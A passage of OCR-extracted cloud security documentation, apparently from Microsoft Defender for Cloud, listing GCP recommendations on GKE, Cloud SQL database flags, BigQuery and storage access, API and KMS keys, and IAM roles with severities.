have OS config agent using Azure Arc auto-provisioning, GCP VMs should 
installed 7 have OS config agent enabled 
GKE cluster's auto repair This recommendation evaluates the management Medium 
feature should be enabled? property of a node pool for the key-value pair, 'key': 
‘autoRepair’, ‘value’: true. 
GKE cluster's auto upgrade This recommendation evaluates the management High 
feature should be enabled? property of a node pool for the key-value pair, 'key': 
‘autoUpgrade’, ‘value’: true. 
Monitoring on GKE clusters This recommendation evaluates whether the Medium 
should be enabled Z monitoringService property of a cluster contains the 
location Cloud Monitoring should use to write metrics. 
GCP Container recommendations 
There are 4 GCP recommendations in this category. 
Recommendation Description Severity 
Advanced Microsoft Defender for Containers provides cloud-native High 
configuration of Kubernetes security capabilities including environment 
Defender for hardening, workload protection, and run-time protection. To 
Containers should ensure you the solution is provisioned properly, and the full set 
be enabled on of capabilities are available, enable all advanced configuration 
GCP connectors’ settings. 
GKE clusters Microsoft Defender's cluster extension provides security High 


capabilities for your GKE clusters. The extension collects data 
from a cluster and its nodes to identify security vulnerabilities 
and threats. 

The extension works with Azure Arc-enabled Kubernetes. 
Learn more about Microsoft Defender for Cloud's security 
features for containerized environments. 


Recommendation 


GKE clusters 
should have the 
Azure Policy 
extension 
installed 7 


Microsoft 
Defender for 
Containers should 
be enabled on 
GCP connectors E 


Description 

Azure Policy extension for Kubernetes extends Gatekeeper’ v3, High 
an admission controller webhook for Open Policy Agent Z (OPA), 
to apply at-scale enforcements and safeguards on your clusters 
in a centralized, consistent manner. 

The extension works with Azure Arc-enabled Kubernetes. 
Microsoft Defender for Containers provides cloud-native High 
Kubernetes security capabilities including environment 

hardening, workload protection, and run-time protection. Enable 
Containers plan on your GCP connector, to harden the security of 
Kubernetes clusters and remediate security issues. Learn more 

about Microsoft Defender for Containers. 


Severity 


Data plane recommendations 


All the data plane recommendations listed here are supported under GCP after enabling 
the Azure policy extension. 


GCP Data recommendations 


There are 28 GCP recommendations in this category. 


Recommendation 


Ensure ‘3625 (trace 
flag)’ database flag for 
Cloud SQL SQL Server 
instance is set to OIS 


Description 


It is recommended to set "3625 (trace flag)" database flag 
for Cloud SQL SQL Server instance to "off". 

Trace flags are frequently used to diagnose performance 
issues or to debug stored procedures or complex computer 
systems, but they may also be recommended by Microsoft 
Support to address behavior that is negatively impacting a 
specific workload. 

All documented trace flags and those recommended by 
Microsoft Support are fully supported in a production 
environment when used as directed. 

"3625(trace log)" Limits the amount of information returned 
to users who are not members of the sysadmin fixed server 
role, by masking the parameters of some error messages 
using SERRE RY 

This can help prevent disclosure of sensitive information, 
hence this is recommended to disable this flag. 

This recommendation is applicable to SQL Server database 
instances. 


Severity 


Medium 


Recommendation 


Ensure ‘external scripts 
enabled’ database flag 
for Cloud SQL SQL 
Server instance is set to 
GES 


Ensure ‘remote access’ 
database flag for Cloud 
SQL SQL Server 
instance is set to OIS 


Description 


It is recommended to set "external scripts enabled" 
database flag for Cloud SQL SQL Server instance to off. 
“external scripts enabled" enable the execution of scripts 
with certain remote language extensions. 

This property is OFF by default. 

When Advanced Analytics Services is installed, setup can 
optionally set this property to true. 

As the “External Scripts Enabled" feature allows scripts 
external to SQL such as files located in an R library to be 
executed, which could adversely affect the security of the 
system, hence this should be disabled. 

This recommendation is applicable to SQL Server database 
instances. 


It is recommended to set "remote access" database flag for 
Cloud SQL SQL Server instance to "off". 

The "remote access" option controls the execution of stored 
procedures from local or remote servers on which instances 
of SQL Server are running. 

This default value for this option is 1. 

This grants permission to run local stored procedures from 
remote servers or remote stored procedures from the local 
server. 

To prevent local stored procedures from being run from a 
remote server or remote stored procedures from being run 
on the local server, this must be disabled. 

The Remote Access option controls the execution of local 
stored procedures on remote servers or remote stored 
procedures on local server. 

‘Remote access’ functionality can be abused to launch a 
Denial-of-Service (DoS) attack on remote servers by off- 
loading query processing to a target, hence this should be 
disabled. 

This recommendation is applicable to SQL Server database 
instances. 


Severity 


High 


High 


Recommendation 


Ensure 
'skip_show_database'’ 
database flag for Cloud 
SQL Mysql instance is 
set to OE 


Ensure that a Default 
Customer-managed 
encryption key (CMEK) 
is specified for all 
BigQuery Data Sets Z 


Description 


It is recommended to set "skip_show_database" database 
flag for Cloud SQL Mysql instance to "on". 
‘skip_show_database’ database flag prevents people from 
using the SHOW DATABASES statement if they do not have 
the SHOW DATABASES privilege. 

This can improve security if you have concerns about users 
being able to see databases belonging to other users. 

Its effect depends on the SHOW DATABASES privilege: If the 
variable value is ON, the SHOW DATABASES statement is 
permitted only to users who have the SHOW DATABASES 
privilege, and the statement displays all database names. 

If the value is OFF, SHOW DATABASES is permitted to all 
users, but displays the names of only those databases for 
which the user has the SHOW DATABASES or other privilege. 
This recommendation is applicable to Mysql database 
instances. 


BigQuery by default encrypts the data as rest by employing 
Envelope Encryption using Google managed cryptographic 
keys. 

The data is encrypted using the data encryption keys and 
data encryption keys themselves are further encrypted using 
key encryption keys. 

This is seamless and do not require any additional input 
from the user. 

However, if you want to have greater control, Customer- 
managed encryption keys (CMEK) can be used as encryption 
key management solution for BigQuery Data Sets. 

BigQuery by default encrypts the data as rest by employing 
Envelope Encryption using Google managed cryptographic 
keys. 

This is seamless and does not require any additional input 
from the user. 

For greater control over the encryption, customer-managed 
encryption keys (CMEK) can be used as encryption key 
management solution for BigQuery Data Sets. 

Setting a Default Customer-managed encryption key (CMEK) 
for a data set ensure any tables created in future will use the 
specified CMEK if none other is provided. 

Note: Google does not store your keys on its servers and 
cannot access your protected data unless you provide the 
key. 

This also means that if you forget or lose your key, there is 
no way for Google to recover the key or to recover any data 
encrypted with the lost key. 


Severity 


Low 


Medium 


Recommendation 


Ensure that all 
BigQuery Tables are 
encrypted with 
Customer-managed 
encryption key 
(CMEK) Z 


Ensure that BigQuery 
datasets are not 
anonymously or 
publicly accessible Z 


Description 


BigQuery by default encrypts the data as rest by employing 
Envelope Encryption using Google managed cryptographic 
keys. 

The data is encrypted using the data encryption keys and 
data encryption keys themselves are further encrypted using 
key encryption keys. 

This is seamless and do not require any additional input 
from the user. 

However, if you want to have greater control, Customer- 
managed encryption keys (CMEK) can be used as encryption 
key management solution for BigQuery Data Sets. 

If CMEK is used, the CMEK is used to encrypt the data 
encryption keys instead of using google-managed 
encryption keys. 

BigQuery by default encrypts the data as rest by employing 
Envelope Encryption using Google managed cryptographic 
keys. 

This is seamless and does not require any additional input 
from the user. 

For greater control over the encryption, customer-managed 
encryption keys (CMEK) can be used as encryption key 
management solution for BigQuery tables. 

The CMEK is used to encrypt the data encryption keys 
instead of using google-managed encryption keys. 
BigQuery stores the table and CMEK association and the 
encryption/decryption is done automatically. 

Applying the Default Customer-managed keys on BigQuery 
data sets ensures that all the new tables created in the 
future will be encrypted using CMEK but existing tables 
need to be updated to use CMEK individually. 

Note: Google does not store your keys on its servers and 
cannot access your protected data unless you provide the 
key. 

This also means that if you forget or lose your key, there is 
no way for Google to recover the key or to recover any data 
encrypted with the lost key. 


It is recommended that the IAM policy on BigQuery datasets 
does not allow anonymous and/or public access. 

Granting permissions to allUsers or allAuthenticatedUsers 
allows anyone to access the dataset. 

Such access might not be desirable if sensitive data is being 
stored in the dataset. 

Therefore, ensure that anonymous and/or public access to a 
dataset is not allowed. 


Severity 


Medium 


High 


Recommendation 


Ensure that Cloud SQL 
database instances are 
configured with 
automated backups č 


Ensure that Cloud SQL 
database instances are 
not open to the 

world #7 


Ensure that Cloud SQL 
database instances do 
not have public IPs £ 


Ensure that Cloud 
Storage bucket is not 
anonymously or 
publicly accessible # 


Description 


It is recommended to have all SQL database instances set to 
enable automated backups. 

Backups provide a way to restore a Cloud SQL instance to 
recover lost data or recover from a problem with that 
instance. 

Automated backups need to be set for any instance that 
contains data that should be protected from loss or 
damage. 

This recommendation is applicable for SQL Server, 
PostgreSql, MySql generation 1 and MySql generation 2 
instances. 


Database Server should accept connections only from 
trusted Network(s)/IP(s) and restrict access from the world. 
To minimize attack surface on a Database server instance, 
only trusted/known and required IP(s) should be white- 
listed to connect to it. 

An authorized network should not have IPs/networks 
configured to "0.0.0.0/0" which will allow access to the 
instance from anywhere in the world. Note that authorized 
networks apply only to instances with public IPs. 


It is recommended to configure Second Generation Sql 
instance to use private IPs instead of public IPs. 

To lower the organization's attack surface, Cloud SQL 
databases should not have public IPs. 

Private IPs provide improved network security and lower 
latency for your application. 


It is recommended that IAM policy on Cloud Storage bucket 
does not allows anonymous or public access. 

Allowing anonymous or public access grants permissions to 
anyone to access bucket content. 

Such access might not be desired if you are storing any 
sensitive data. 

Hence, ensure that anonymous or public access to a bucket 
is not allowed. 


Severity 


High 


High 


High 


High 


Recommendation 


Ensure that Cloud 
Storage buckets have 
uniform bucket-level 
access enabled 7 


Description 


It is recommended that uniform bucket-level access is 
enabled on Cloud Storage buckets. 

It is recommended to use uniform bucket-level access to 
unify and simplify how you grant access to your Cloud 
Storage resources. 

Cloud Storage offers two systems for granting users 
permission to access your buckets and objects: 

Cloud Identity and Access Management (Cloud IAM) and 
Access Control Lists (ACLs). 

These systems act in parallel - in order for a user to access a 
Cloud Storage resource, only one of the systems needs to 
grant the user permission. 

Cloud IAM is used throughout Google Cloud and allows you 
to grant a variety of permissions at the bucket and project 
levels. 

ACLs are used only by Cloud Storage and have limited 
permission options, but they allow you to grant permissions 
on a per-object basis. 


In order to support a uniform permissioning system, Cloud 
Storage has uniform bucket-level access. 

Using this feature disables ACLs for all Cloud Storage 
resources: 

access to Cloud Storage resources then is granted 
exclusively through Cloud IAM. 

Enabling uniform bucket-level access guarantees that if a 
Storage bucket is not publicly accessible, 

no object in the bucket is publicly accessible either. 


Severity 


Medium 


Recommendation 


Ensure that Compute 
instances have 
Confidential 
Computing enabled #7 


Ensure that retention 
policies on log buckets 
are configured using 
Bucket Lock # 


Description 


Google Cloud encrypts data at-rest and in-transit, but 
customer data must be decrypted for processing. 
Confidential Computing is a breakthrough technology which 
encrypts data in-use-while it is being processed. 
Confidential Computing environments keep data encrypted 
in memory and elsewhere outside the central processing 
unit (CPU). 

Confidential VMs leverage the Secure Encrypted 
Virtualization (SEV) feature of AMD EPYC CPUs. 

Customer data will stay encrypted while it is used, indexed, 
queried, or trained on. 

Encryption keys are generated in hardware, per VM, and not 
exportable. Thanks to built-in hardware optimizations of 
both performance and security, there is no significant 
performance penalty to Confidential Computing workloads. 
Confidential Computing enables customers’ sensitive code 
and other data encrypted in memory during processing. 
Google does not have access to the encryption keys. 
Confidential VM can help alleviate concerns about risk 
related to either dependency on Google infrastructure or 
Google insiders' access to customer data in the clear. 


Enabling retention policies on log buckets will protect logs 
stored in cloud storage buckets from being overwritten or 
accidentally deleted. 

It is recommended to set up retention policies and 
configure Bucket Lock on all storage buckets that are used 
as log sinks. 

Logs can be exported by creating one or more sinks that 
include a log filter and a destination. As Stackdriver Logging 
receives new log entries, they are compared against each 
sink. 

If a log entry matches a sink's filter, then a copy of the log 
entry is written to the destination. 

Sinks can be configured to export logs in storage buckets. 
It is recommended to configure a data retention policy for 
these cloud storage buckets and to lock the data retention 
policy; thus permanently preventing the policy from being 
reduced or removed. 

This way, if the system is ever compromised by an attacker 
or a malicious insider who wants to cover their tracks, the 
activity logs are definitely preserved for forensics and 
security investigations. 


Severity 


High 


Low 


Recommendation 


Ensure that the Cloud 
SQL database instance 
requires all incoming 
connections to use 
SSL“ 


Ensure that the 
‘contained database 
authentication’ 
database flag for Cloud 
SQL on the SQL Server 
instance is set to OIS 


Ensure that the ‘cross 
db ownership chaining’ 
database flag for Cloud 
SQL SQL Server 
instance is set to OIS 


Description Severity 


It is recommended to enforce all incoming connections to High 
SQL database instance to use SSL. 

SQL database connections if successfully trapped (MITM); 

can reveal sensitive data like credentials, database queries, 

query outputs etc. 

For security, it is recommended to always use SSL 

encryption when connecting to your instance. 

This recommendation is applicable for Postgresql, MySql 

generation 1 and MySql generation 2 instances. 


It is recommended to set "contained database Medium 
authentication" database flag for Cloud SQL on the SQL 
Server instance is set to "off". 

A contained database includes all database settings and 
metadata required to define the database and has no 
configuration dependencies on the instance of the Database 
Engine where the database is installed. 

Users can connect to the database without authenticating a 
login at the Database Engine level. 

Isolating the database from the Database Engine makes it 
possible to easily move the database to another instance of 
SQL Server. 

Contained databases have some unique threats that should 
be understood and mitigated by SQL Server Database 
Engine administrators. 

Most of the threats are related to the USER WITH 
PASSWORD authentication process, which moves the 
authentication boundary from the Database Engine level to 
the database level, hence this is recommended to disable 
this flag. 

This recommendation is applicable to SQL Server database 
instances. 


It is recommended to set "cross db ownership chaining" Medium 
database flag for Cloud SQL SQL Server instance to "off". 
Use the "cross db ownership" for chaining option to 
configure cross-database ownership chaining for an 
instance of Microsoft SQL Server. 

This server option allows you to control cross-database 
ownership chaining at the database level or to allow cross- 
database ownership chaining for all databases. 

Enabling "cross db ownership" is not recommended unless 
all of the databases hosted by the instance of SQL Server 
must participate in cross-database ownership chaining and 
you are aware of the security implications of this setting. 
This recommendation is applicable to SQL Server database 
instances. 


Recommendation 


Ensure that the 
‘local_infile' database 
flag for a Cloud SQL 
Mysql instance is set to 
OIS 


Ensure that the log 
metric filter and alerts 
exist for Cloud Storage 
IAM permission 
changes E 


Ensure that the log 
metric filter and alerts 
exist for SQL instance 
configuration 
changes E 


Description 


It is recommended to set the local_infile database flag for a 
Cloud SQL MySQL instance to off. 

The local_infile flag controls the server-side LOCAL capability 
for LOAD DATA statements. Depending on the local_infile 
setting, the server refuses or permits local data loading by 
clients that have LOCAL enabled on the client side. 

To explicitly cause the server to refuse LOAD DATA LOCAL 
statements (regardless of how client programs and libraries 
are configured at build time or runtime), start mysqld with 
local_infile disabled. local_infile can also be set at runtime. 
Due to security issues associated with the local_infile flag, it 
is recommended to disable it. This recommendation is 
applicable to MySQL database instances. 


It is recommended that a metric filter and alarm be 
established for Cloud Storage Bucket IAM changes. 
Monitoring changes to cloud storage bucket permissions 
may reduce the time needed to detect and correct 
permissions on sensitive cloud storage buckets and objects 
inside the bucket. 


It is recommended that a metric filter and alarm be 
established for SQL instance configuration changes. 
Monitoring changes to SQL instance configuration changes 
may reduce the time needed to detect and correct 
misconfigurations done on the SQL server. 

Below are a few of the configurable options which may the 
impact security posture of an SQL instance: 

* Enable auto backups and high availability: 
Misconfiguration may adversely impact business continuity, 
disaster recovery, and high availability 

* Authorize networks: Misconfiguration may increase 
exposure to untrusted networks 


Severity 


Medium 


Low 


Low 


Recommendation 


Ensure that there are 
only GCP-managed 
service account keys 
for each service 
account & 


Description 


User managed service accounts should not have user- 
managed keys. 

Anyone who has access to the keys will be able to access 
resources through the service account. GCP-managed keys 
are used by Cloud Platform services such as App Engine and 
Compute Engine. These keys cannot be downloaded. 
Google will keep the keys and automatically rotate them on 
an approximately weekly basis. 

User-managed keys are created, downloadable, and 
managed by users. They expire 10 years from creation. 

For user-managed keys, the user has to take ownership of 
key management activities which include: 


e Key storage 

e Key distribution 

e Key revocation 

e Key rotation 

e Protecting the keys from unauthorized users 
e Key recovery 


Even with key owner precautions, keys can be easily leaked 
by common development malpractices like checking keys 
into the source code or leaving them in the Downloads 
directory, or accidentally leaving them on support 
blogs/channels. It is recommended to prevent user- 
managed service account keys. 


Severity 


Low 


Recommendation 


Ensure ‘user 
connections’ database 
flag for Cloud SQL SQL 
Server instance is set as 
appropriate“ 


Ensure ‘user options’ 
database flag for Cloud 
SQL SQL Server 
instance is not 
configured č 


Logging for GKE 
clusters should be 
enabled @ 


Description 


It is recommended to set "user connections" database flag 
for Cloud SQL SQL Server instance according organization- 
defined value. 

The "user connections" option specifies the maximum 
number of simultaneous user connections that are allowed 
on an instance of SQL Server. 

The actual number of user connections allowed also 
depends on the version of SQL Server that you are using, 
and also the limits of your application or applications and 
hardware. 

SQL Server allows a maximum of 32,767 user connections. 
Because user connections is a dynamic (self-configuring) 
option, SQL Server adjusts the maximum number of user 
connections automatically as needed, up to the maximum 
value allowable. 

For example, if only 10 users are logged in, 10 user 
connection objects are allocated. 

In most cases, you do not have to change the value for this 
option. 

The default is 0, which means that the maximum (32,767) 
user connections are allowed. 

This recommendation is applicable to SQL Server database 
instances. 


It is recommended that, "user options" database flag for 
Cloud SQL SQL Server instance should not be configured. 
The "user options" option specifies global defaults for all 
users. 

A list of default query processing options is established for 
the duration of a user's work session. 

The user options option allows you to change the default 
values of the SET options (if the server's default settings are 
not appropriate). 

A user can override these defaults by using the SET 
statement. 

You can configure user options dynamically for new logins. 
After you change the setting of user options, new login 
sessions use the new setting; current login sessions are not 
affected. 

This recommendation is applicable to SQL Server database 
instances. 


This recommendation evaluates whether the loggingService 
property of a cluster contains the location Cloud Logging 
should use to write logs. 


Severity 


Low 


Low 


High 


Recommendation Description Severity 


Object versioning This recommendation evaluates whether the enabled field in High 
should be enabled on the bucket's versioning property is set to true. 

storage buckets where 

sinks are configured £ 


Over-provisioned Over-provisioned identities in projects should be Medium 
identities in projects investigated to reduce the Permission Creep Index (PCI) and 

should be investigated to safeguard your infrastructure. Reduce the PCI by 

to reduce the removing the unused high risk permission assignments. 

Permission Creep Index High PCI reflects risk associated with the identities with 

(PCI) Z permissions that exceed their normal or required usage 

Projects that have This recommendation evaluates the IAM allow policy in Medium 
cryptographic keys project metadata for principals assigned roles/Owner. 


should not have users 
with Owner 
permissions 4% 


Storage buckets used This recommendation evaluates the IAM policy of a bucket High 
as a log sink should not for the principals allUsers or allAuthenticatedUsers, which 

be publicly grant public access. 

accessible Z 


GCP IdentityAndAccess recommendations 


There are 25 GCP recommendations in this category. 


Recommendation Description Severity 


Cryptographic keys This recommendation evaluates IAM policies for key rings, Medium 
should not have more projects, and organizations, and retrieves principals with 
than three users E roles that allow them to encrypt, decrypt or sign data using 
Cloud KMS keys: roles/owner, 
roles/cloudkms.cryptoKeyEncrypterDecrypter, 
roles/cloudkms.cryptoKeyEncrypter, 
roles/cloudkms.cryptoKeyDecrypter, roles/cloudkms.signer, 
and roles/cloudkms.signerVerifier. 


Recommendation 


Ensure API keys are not 
created for a project’ 


Ensure API keys are 
restricted to only APIs 
that application needs 
access E 


Description 


Keys are insecure because they can be viewed publicly, such 
as from within a browser, or they can be accessed ona 
device where the key resides. It is recommended to use 
standard authentication flow instead. 


Security risks involved in using API-Keys appear below: 

1. API keys are simple encrypted strings 

2. API keys do not identify the user or the application 
making the API request 

3. API keys are typically accessible to clients, making it easy 
to discover and steal an API key 


To avoid the security risk in using API keys, it is 
recommended to use standard authentication flow instead. 


API keys are insecure because they can be viewed publicly, 
such as from within a browser, or they can be accessed on a 
device where the key resides. It is recommended to restrict 
API keys to use (call) only APIs required by an application. 


Security risks involved in using API-Keys are below: 

1. API keys are simple encrypted strings 

2. API keys do not identify the user or the application 
making the API request 

3. API keys are typically accessible to clients, making it easy 
to discover and steal an API key 


In light of these potential risks, Google recommends using 
the standard authentication flow instead of API-Keys. 
However, there are limited cases where API keys are more 
appropriate. For example, if there is a mobile application 
that needs to use the Google Cloud Translation API, but 
doesn't otherwise need a backend server, API keys are the 
simplest way to authenticate to that API. 


In order to reduce attack surfaces by providing least 
privileges, API-Keys can be restricted to use (call) only APIs 
required by an application. 


Severity 


High 


High 


Recommendation 


Ensure API keys are 
restricted to use by 
only specified Hosts 
and Apps Z 


Description 


Unrestricted keys are insecure because they can be viewed 
publicly, such as from within a browser, or they can be 
accessed on a device where the key resides. It is 
recommended to restrict API key usage to trusted hosts, 
HTTP referrers and apps. 


Security risks involved in using API-Keys appear below: 

1. API keys are simple encrypted strings 

2. API keys do not identify the user or the application 
making the API request 

3. API keys are typically accessible to clients, making it easy 
to discover and steal an API key 


In light of these potential risks, Google recommends using 
the standard authentication flow instead of API keys. 
However, there are limited cases where API keys are more 
appropriat. 

For example, if there is a mobile application that needs to 
use the Google Cloud Translation API, but doesn't otherwise 
need a backend server, API keys are the simplest way to 
authenticate to that API. 


In order to reduce attack vectors, API-Keys can be restricted 
only to trusted hosts, HTTP referrers and applications. 


Severity 


High 


Recommendation 


Ensure API keys are 
rotated every 90 days 7 


Description 
It is recommended to rotate API keys every 90 days. 


Security risks involved in using API-Keys are listed below: 

1. API keys are simple encrypted strings 

2. API keys do not identify the user or the application 
making the API request 

3. API keys are typically accessible to clients, making it easy 
to discover and steal an API key 


Because of these potential risks, Google recommends using 
the standard authentication flow instead of API Keys. 
However, there are limited cases where API keys are more 
appropriate. For example, if there is a mobile application 
that needs to use the Google Cloud Translation API, but 
doesn't otherwise need a backend server, API keys are the 
simplest way to authenticate to that API. 


Once a key is stolen, it has no expiration, meaning it may be 
used indefinitely unless the project owner revokes or 
regenerates the key. Rotating API keys will reduce the 
window of opportunity for an access key that is associated 
with a compromised or terminated account to be used. 


API keys should be rotated to ensure that data cannot be 
accessed with an old key that might have been lost, cracked, 
or stolen. 


Severity 


High 


Recommendation 


Ensure KMS encryption 
keys are rotated within 
a period of 90 days? 


Description Severity 


Google Cloud Key Management Service stores Medium 
cryptographic keys in a hierarchical structure designed for 
useful and elegant access control management. 

The format for the rotation schedule depends on the client 
library that is used. 

For the gcloud command-line tool, the next rotation time 
must be in "ISO" or "RFC3339" format, and the rotation 
period must be in the form "INTEGER[UNIT]", where units 
can be one of seconds (s), minutes (m), hours (h) or days (d). 
Set a key rotation period and starting time. A key can be 
created with a specified "rotation period", which is the time 
between when new key versions are generated 
automatically. 

A key can also be created with a specified next rotation 
time. 

A key is a named object representing a "cryptographic key" 
used for a specific purpose. 

The key material, the actual bits used for "encryption", can 
change over time as new key versions are created. 

A key is used to protect some "corpus of data". A collection 
of files could be encrypted with the same key and people 
with "decrypt" permissions on that key would be able to 
decrypt those files. 

Therefore, it's necessary to make sure the "rotation period" 
is set to a specific time. 


Recommendation 


Ensure log metric filter 
and alerts exist for 
project ownership 
assignments/changes E 


Ensure oslogin is 
enabled for a Project’ 


Description Severity 


In order to prevent unnecessary project ownership Low 
assignments to users/service-accounts and further misuses 
of projects and resources, all "roles/Owner" assignments 
should be monitored. 

Members (users/Service-Accounts) with a role assignment 
to primitive role "roles/Owner" are project owners. 

The project owner has all the privileges on the project the 
role belongs to. These are summarized below: 

- All viewer permissions on all GCP Services within the 
project 

- Permissions for actions that modify the state of all GCP 
services within the project 

- Manage roles and permissions for a project and all 
resources within the project 

- Set up billing for a project 

Granting the owner role to a member (user/Service- 
Account) will allow that member to modify the Identity and 
Access Management (IAM) policy. Therefore, grant the 
owner role only if the member has a legitimate purpose to 
manage the IAM policy. This is because the project IAM 
policy contains sensitive access control data. Having a 
minimal set of users allowed to manage IAM policy will 
simplify any auditing that may be necessary. 

Project ownership has the highest level of privileges on a 
project. To avoid misuse of project resources, the project 
ownership assignment/change actions mentioned above 
should be monitored and alerted to concerned recipients. 
- Sending project ownership invites 

- Acceptance/Rejection of project ownership invite by user 
- Adding role\owner to a user/service-account 

- Removing a user/Service account from role\Owner 


Enabling OS login binds SSH certificates to IAM users and Medium 
facilitates effective SSH certificate management. 

Enabling osLogin ensures that SSH keys used to connect to 
instances are mapped with IAM users. Revoking access to 
IAM user will revoke all the SSH keys associated with that 
particular user. 

It facilitates centralized and automated SSH key pair 
management which is useful in handling cases like response 
to compromised SSH key pairs and/or revocation of 
external/third-party/Vendor users. 

To find out which instance causes the project to be 
unhealthy see recommendation "Ensure oslogin is enabled 
for all instances". 


Recommendation 


Ensure oslogin is 
enabled for all 
instances E 


Ensure that Cloud Audit 
Logging is configured 
properly across all 
services and all users 
from a project £ 


Description Severity 


Enabling OS login binds SSH certificates to IAM users and Medium 
facilitates effective SSH certificate management. 

Enabling osLogin ensures that SSH keys used to connect to 

instances are mapped with IAM users. Revoking access to 

IAM user will revoke all the SSH keys associated with that 

particular user. 

It facilitates centralized and automated SSH key pair 

management which is useful in handling cases like response 

to compromised SSH key pairs and/or revocation of 
external/third-party/Vendor users. 


It is recommended that Cloud Audit Logging is configured Medium 
to track all admin activities and read, write access to user 
data. 

Cloud Audit Logging maintains two audit logs for each 
project, folder, and organization: Admin Activity and Data 
Access. 

1. Admin Activity logs contain log entries for API calls or 
other administrative actions that modify the configuration 
or metadata of resources. 

Admin Activity audit logs are enabled for all services and 
cannot be configured. 2. Data Access audit logs record API 
calls that create, modify, or read user-provided data. These 
are disabled by default and should be enabled. 

There are three kinds of Data Access audit log information: 


e Admin read: Records operations that read metadata 
or configuration information. Admin Activity audit 
logs record writes of metadata and configuration 
information that cannot be disabled. 

e Data read: Records operations that read user- 
provided data. 

e Data write: Records operations that write user- 
provided data. 


It is recommended to have an effective default audit config 
configured in such a way that: 

1. logtype is set to DATA_READ (to log user activity tracking) 
and DATA_WRITES (to log changes/tampering to user data). 
2. audit config is enabled for all the services supported by 
the Data Access audit logs feature. 3. Logs should be 
captured for all users, i.e., there are no exempted users in 
any of the audit config sections. This will ensure overriding 
the audit config will not contradict the requirement. 


Recommendation Description Severity 


Ensure that Cloud KMS Itis recommended that the IAM policy on Cloud KMS High 
cryptokeys are not “cryptokeys" should restrict anonymous and/or public 
anonymously or access. 

publicly accessible z Granting permissions to “allUsers" or 


“allAuthenticatedUsers" allows anyone to access the 
dataset. 

Such access might not be desirable if sensitive data is 
stored at the location. 

In this case, ensure that anonymous and/or public access to 
a Cloud KMS "cryptokey" is not allowed. 


Ensure that corporate Use corporate login credentials instead of personal High 
login credentials are accounts, such as Gmail accounts. 
used 7 It is recommended fully-managed corporate Google 


accounts be used for increased visibility, auditing, and 
controlling access to Cloud Platform resources. 

Gmail accounts based outside of the user's organization, 
such as personal accounts, should not be used for business 
purposes. 


Recommendation 


Ensure that IAM users 
are not assigned the 
Service Account User or 
Service Account Token 
Creator roles at project 
level 2 


Description 


It is recommended to assign the "Service Account User 
(iam.serviceAccountUser)" and "Service Account Token 
Creator (iam.serviceAccountTokenCreator)" roles to a user 
for a specific service account rather than assigning the role 
to a user at project level. 

A service account is a special Google account that belongs 
to an application or a virtual machine (VM), instead of to an 
individual end-user. 

Application/VM-Instance uses the service account to call the 
service's Google API so that users aren't directly involved. 
In addition to being an identity, a service account is a 
resource that has IAM policies attached to it. These policies 
determine who can use the service account. 

Users with IAM roles to update the App Engine and 
Compute Engine instances (such as App Engine Deployer or 
Compute Instance Admin) can effectively run code as the 
service accounts used to run these instances, and indirectly 
gain access to all the resources for which the service 
accounts have access. 

Similarly, SSH access to a Compute Engine instance may 
also provide the ability to execute code as that 
instance/Service account. 

Based on business needs, there could be multiple user- 
managed service accounts configured for a project. 
Granting the "iam.serviceAccountUser" or 
“iam.serviceAserviceAccountTokenCreatorccountUser" roles 
to a user for a project gives the user access to all service 
accounts in the project, including service accounts that may 
be created in the future. 

This can result in elevation of privileges by using service 
accounts and corresponding "Compute Engine instances". 
In order to implement "least privileges" best practices, IAM 
users should not be assigned the "Service Account User" or 
"Service Account Token Creator" roles at the project level. 
Instead, these roles should be assigned to a user for a 
specific service account, giving that user access to the 
service account. The "Service Account User" allows a user to 
bind a service account to a long-running job service, 
whereas the "Service Account Token Creator" role allows a 
user to directly impersonate (or assert) the identity of a 
service account. 


Severity 


Medium 


Recommendation 


Ensure that Separation 
of duties is enforced 
while assigning KMS 
related roles to users č 


Description 


It is recommended that the principle of ‘Separation of 
Duties’ is enforced while assigning KMS related roles to 
users. 

The built-in/predefined IAM role "Cloud KMS Admin" allows 
the user/identity to create, delete, and manage service 
account(s). 

The built-in/predefined IAM role "Cloud KMS CryptoKey 
Encrypter/Decrypter" allows the user/identity (with 
adequate privileges on concerned resources) to encrypt and 
decrypt data at rest using an encryption key(s). 

The built-in/predefined IAM role Cloud KMS CryptoKey 
Encrypter allows the user/identity (with adequate privileges 
on concerned resources) to encrypt data at rest using an 
encryption key(s). 

The built-in/predefined IAM role "Cloud KMS CryptoKey 
Decrypter" allows the user/identity (with adequate 
privileges on concerned resources) to decrypt data at rest 
using an encryption key(s). 

Separation of duties is the concept of ensuring that one 
individual does not have all necessary permissions to be 
able to complete a malicious action. 

In Cloud KMS, this could be an action such as using a key to 
access and decrypt data a user should not normally have 
access to. 

Separation of duties is a business control typically used in 
larger organizations, meant to help avoid security or privacy 
incidents and errors. 

It is considered best practice. No user(s) should have Cloud 
KMS Admin and any of the "Cloud KMS CryptoKey 
Encrypter/Decrypter", "Cloud KMS CryptoKey Encrypter", 
“Cloud KMS CryptoKey Decrypter" roles assigned at the 
same time. 


Severity 


High 


Recommendation 


Ensure that Separation 
of duties is enforced 
while assigning service 
account related roles to 
users E 


Ensure that Service 
Account has no Admin 
privileges Z 


Description Severity 


It is recommended that the principle of ‘Separation of Medium 
Duties' is enforced while assigning service-account related 
roles to users. 

The built-in/predefined IAM role "Service Account admin" 
allows the user/identity to create, delete, and manage 
service account(s). 

The built-in/predefined IAM role "Service Account User" 
allows the user/identity (with adequate privileges on 
Compute and App Engine) to assign service account(s) to 
Apps/Compute Instances. 

Separation of duties is the concept of ensuring that one 
individual does not have all necessary permissions to be 
able to complete a malicious action. 

In Cloud IAM - service accounts, this could be an action 
such as using a service account to access resources that 
user should not normally have access to. 

Separation of duties is a business control typically used in 
larger organizations, meant to help avoid security or privacy 
incidents and errors. It is considered best practice. 

No user should have "Service Account Admin" and "Service 
Account User" roles assigned at the same time. 


A service account is a special Google account that belongs Medium 
to an application or a VM, instead of to an individual end- 
user. 

The application uses the service account to call the service's 
Google API so that users aren't directly involved. 

It's recommended not to use admin access for 
ServiceAccount. 

Service accounts represent service-level security of the 
Resources (application or a VM) which can be determined 
by the roles assigned to it. 

Enrolling ServiceAccount with Admin rights gives full access 
to an assigned application or a VM. 

A ServiceAccount Access holder can perform critical actions 
like delete, update change settings, etc. 

without user intervention. 

For this reason, it's recommended that service accounts not 
have Admin rights. 


Recommendation Description Severity 


Ensure that sinks are It is recommended to create a sink that will export copies of Low 
configured for all log all the log entries. This can help aggregate logs from 
entries E multiple projects and export them to a Security Information 


and Event Management (SIEM). 

Log entries are held in Stackdriver Logging. To aggregate 
